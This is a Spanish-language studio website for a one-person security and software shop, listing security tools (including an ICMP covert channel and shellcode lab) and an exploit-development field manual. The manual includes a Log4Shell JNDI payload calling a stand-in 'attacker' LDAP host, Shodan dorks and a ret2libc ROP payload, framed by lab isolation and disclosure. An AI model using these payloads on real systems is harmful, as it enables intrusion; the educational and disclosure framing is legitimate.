Construimos
software que
importa.

Apps, herramientas y proyectos donde el rigor técnico y la creatividad no son opuestos — son la misma cosa.

Ver productos Sobre el estudio
7+ Productos activos
2024 Fundado
100% Independiente
— Catálogo

Productos

Cada herramienta resuelve un problema real que ninguna otra resolvía como debía.

— Stack

Tecnología
sin compromisos

Sin frameworks de moda. Sin vendor lock-in. Sin dependencias que mañana pueden desaparecer. Cada decisión técnica se toma con la pregunta: ¿funcionará esto dentro de diez años?

Código nativo donde importa el rendimiento. Estándares abiertos donde importa la interoperabilidad. Arquitectura limpia donde importa el mantenimiento.

  • Nativo primero

    Swift/SwiftUI para macOS e iOS. Rendimiento real, integración real con el sistema operativo.

  • Privacidad por diseño

    Sin telemetría invasiva. Sin cuentas obligatorias. Los datos del usuario son del usuario.

  • Open source parcial

    Las herramientas de seguridad y los algoritmos base son públicos. El producto añade valor encima.

— Quiénes somos

Un estudio.
Una persona.
Un estándar.

VampSecure Studios es un estudio unipersonal fundado por Antonio Hernández López. Sin inversores. Sin comité editorial. Sin jefe de producto que no entiende el código.

Eso significa decisiones más lentas en lo accesorio y más rápidas en lo que importa. Significa que cada producto refleja la visión de quien lo construye sin filtros corporativos.

El estudio opera en la intersección de la ciberseguridad, el audio y los proyectos creativos — porque las mejores herramientas nacen cuando la competencia técnica y la sensibilidad artística se cruzan.

El Alma Desnuda — sello editorial
— Código abierto

Open Source

Herramientas libres. El conocimiento en seguridad debe ser público.

Python CC BY 4.0 macOS · Apple Silicon

Vamp-Mac-Pulse v9.1

// Neural Sentinel — dashboard forense y de seguridad para Apple Silicon M3

Herramienta de auditoría de seguridad y diagnóstico forense diseñada específicamente para sistemas Apple Silicon M3. Monitorización en tiempo real de red, privacidad del hardware y análisis de integridad del sistema.

  • Red Warden — Detección de ataques MITM y análisis de MACs aleatorizadas en tiempo real
  • Privacy Shield — Monitorización de uso de micrófono y cámara vía motores de audio del sistema
  • Forensic Integrity — Análisis de entropía para detección de ransomware y vigilancia del hosts
  • M3 Deep Pulse — Acceso a nivel kernel: temperatura CPU, batería, USB y Bluetooth conectados
  • Geo-IP Insight — Correlación de conexiones activas con geolocalización e ISP
Instalación 
pip install psutil colorama
sudo python vamp_mac_pulse_pub.py
Ver en GitHub → @belky-me
CIBERTOOLS_LAB — Suite de herramientas de seguridad educativas
Python · Scapy MIT

ARP-Sentinel v1.1

// Detección y simulación de ARP spoofing

Monitor defensivo con fase de aprendizaje + alertas en tiempo real. Incluye módulo de ataque PoC para validar la detección en laboratorio.

GitHub →
Python MIT

CVE Oracle

// Inteligencia de CVEs con NIST NVD + OTX

Analizador de vulnerabilidades con CVSS v3.1, pulsos de threat intelligence de AlienVault OTX y generación automática de estrategias PoC.

GitHub →
Python MIT

Entropy Watch v1.3

// Detector de ransomware por entropía Shannon

Monitoriza directorios en tiempo real. Ficheros con entropía > 7.0 bits/byte son aislados automáticamente en cuarentena. Sin dependencias externas.

GitHub →
Python · Scapy MIT

ICMP Shadow v1.1

// Canal encubierto sobre ICMP · XOR + Base64

Canal de comunicación encubierto sobre paquetes ICMP Echo Request. Cifrado XOR con clave personalizable + codificación Base64 para transporte.

GitHub →
Python · asyncio MIT

PassiveRecon v1.0

// Subdominios + cabeceras HTTP · 0 tráfico al target

Enumeración pasiva de subdominios (crt.sh, OTX, HackerTarget, Wayback…) y análisis de cabeceras de seguridad HTTP. Salida en consola, JSON y HTML.

GitHub →
C · ARM64 asm MIT

Shell Lab v4

// mmap RWX · syscalls ARM64 · shellcode sandbox

Laboratorio de shellcode ARM64: reserva de memoria ejecutable con mmap, syscalls Linux directas sin libc e inyección de ensamblador inline en C.

GitHub →
Ver todos los repositorios en GitHub →
— Inteligencia de amenazas

VampSecure Node

Vigilancia 24h activa. CVEs en tiempo real desde NIST NVD · Incidentes desde BleepingComputer · Nivel de amenaza calculado automáticamente.

THREAT_LEVEL_24H
CALIBRANDO...

Escaneando vectores de ataque activos...

INCIDENT_LOG — LIVE
Conectando con fuentes OSINT...
LAST_SYNC: INICIANDO... — AUTO-REFRESH: 5min
CVE_SURVEILLANCE_STREAM — NIST NVD 24H ENLACE_NIST: INICIANDO...
Consultando registros NIST...
FIELD_MANUAL — EXPLOIT_REVERSE_ENGINEERING

IDENTIFICACIÓN

Cuando un CVE entra en el stream, el primer paso es clasificarlo antes de invertir tiempo en él. Consultar el CWE (Common Weakness Enumeration) asociado determina si estamos ante un desbordamiento de buffer (CWE-787), use-after-free (CWE-416), inyección de código (CWE-94) o path traversal (CWE-22).

Verificar el EPSS score (Exploit Prediction Scoring System): probabilidad real de que exista exploit en los próximos 30 días. Un CVE con CVSS 9.8 pero EPSS 0.03 tiene prioridad inferior a uno con CVSS 7.5 y EPSS 0.87.

EJEMPLO CVE-2024-3094 · XZ Utils · CWE-506 (backdoor en liblzma) · CVSS 10.0 · EPSS 0.95 → CRÍTICO Afecta a systemd en Debian/Fedora sid. Vector: acceso SSH comprometido por liblzma maliciosa.

RECON & PoC

Con la clasificación clara, buscar Proof of Concept en fuentes verificadas. La velocidad importa: el 50% de los PoC aparecen en GitHub en menos de 48h. Buscar con gh search repos CVE-XXXX-XXXXX --sort=updated y filtrar por estrellado reciente. Validar el PoC antes de ejecutarlo: revisar el diff completo, comprobar firma del autor, aislar en docker run --network none.

Para mapear el parque vulnerable: Nuclei con templates oficiales (nuclei -t cves/2024/ -u https://target) es más fiable que Shodan para versiones exactas. Shodan es útil para rangos: http.title:"Apache Struts" http.status:200 country:ES o ssl.cert.subject.cn:*.target.com port:8443.

Confirmar la versión vulnerable antes de explotar: muchas distribuciones aplican backports de parches sin cambiar la versión del binario. Comprobar siempre con strings binary | grep -E "version|build" o via banner grabbing.

EJEMPLO nuclei -t cves/2021/CVE-2021-44228.yaml -u https://target.com -H "User-Agent: {{jndi:ldap://attacker/x}}" Log4Shell: Nuclei detecta el callback JNDI en el User-Agent. Requisito: JDK ≤ 8u191 sin parche de diciembre 2021.

BINARY_DIFFING

Si no hay PoC pero el parche oficial ya existe, el código modificado revela el punto exacto de la vulnerabilidad. Descargar las dos versiones del binario (vulnerable y parcheada) y comparar con BinDiff o Diaphora desde Ghidra/IDA.

El diffing identifica las funciones modificadas. Desensamblar con Radare2 o Ghidra para leer el flujo de control antes y después del parche. Los cambios en validaciones de bounds o en punteros son el punto de entrada.

EJEMPLO r2 -A libssl.so.3 && afl~SSL_read → pdf @ sym.SSL_read Diff entre OpenSSL 3.0.6 y 3.0.7 (CVE-2022-3602): función ossl_punycode_decode() añade check de índice en offset +0x4a. Sin el parche: stack overflow de 4 bytes.

EXPLOIT_BUILD

Con el vector confirmado, construir el payload en entorno completamente aislado (red desconectada, snapshot previo). Calcular offset con pwntools cyclic(300): el crash vuelca el valor del registro $rip o $rsp con el patrón. cyclic_find(0x61616171) devuelve el offset exacto — nunca asumir el que aparece en writeups de otros.

Gadgets ROP: ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --rop | grep "pop rdi". Verificar mitigaciones activas con checksec --file=./vuln (NX, PIE, RELRO, canary). Si hay canary, el enfoque cambia a format-string leak o heap overflow que evite el stack.

Objetivo: control confirmado del instruction pointer en lab. Documentar el primitivo exacto (write-what-where, RCE, LPE) antes de escalar.

EJEMPLO cyclic(300) → crash en $rip=0x61616171 → cyclic_find(0x61616171) → 264 Payload final con ret2libc: b'A'*264 + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system). El gadget ret extra alinea el stack a 16 bytes para libc en Ubuntu ≥ 18.04.

DISCLOSURE_CHAIN

El exploit funciona en lab. Ahora empieza el trabajo que distingue a un profesional de un script kiddie. En bug bounty: abrir el reporte en la plataforma (HackerOne/Bugcrowd) con CVSS calculado, PoC reproducible paso a paso y entorno exacto. Sin exagerar el impacto ni minorizarlo.

En pentest: el hallazgo va al informe estructurado con severidad, vector CVSS v3.1 completo (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), evidencia de explotación y recomendación de mitigación concreta — no "actualizar el software" sino "aplicar parche CVE-XXXX-XXXXX o mitigar con WAF rule X".

En responsible disclosure directa al vendor: contactar security@vendor.com con cifrado GPG, adjuntar el reporte y fijar un deadline de 90 días (estándar Google Project Zero). Registrar en MITRE si el vendor no responde en 7 días.

EJEMPLO gpg --encrypt --recipient security@vendor.com report.txt → enviar con CVSSv3.1 + timeline + PoC Día 0: contacto. Día 7: confirmación de recepción. Día 90: publicación coordinada o unilateral. Incluir IoCs si hay explotación activa en wild.

Datos de NIST NVD (API pública) y BleepingComputer. Esta sección es informativa y gratuita. Para inteligencia avanzada y monitorización personalizada, contáctanos.

— Conocimiento abierto

Blog técnico

Notas de campo, postmortems y reflexiones sobre el proceso de construir software independiente.

Proponer tema o colaboración
— Hablemos

¿Tienes un
proyecto en mente?

Consultoría técnica, colaboración en proyectos de software o simplemente una conversación sobre arquitectura, seguridad o herramientas creativas.

ahernandez@vampsecure.com El Alma Desnuda — proyecto editorial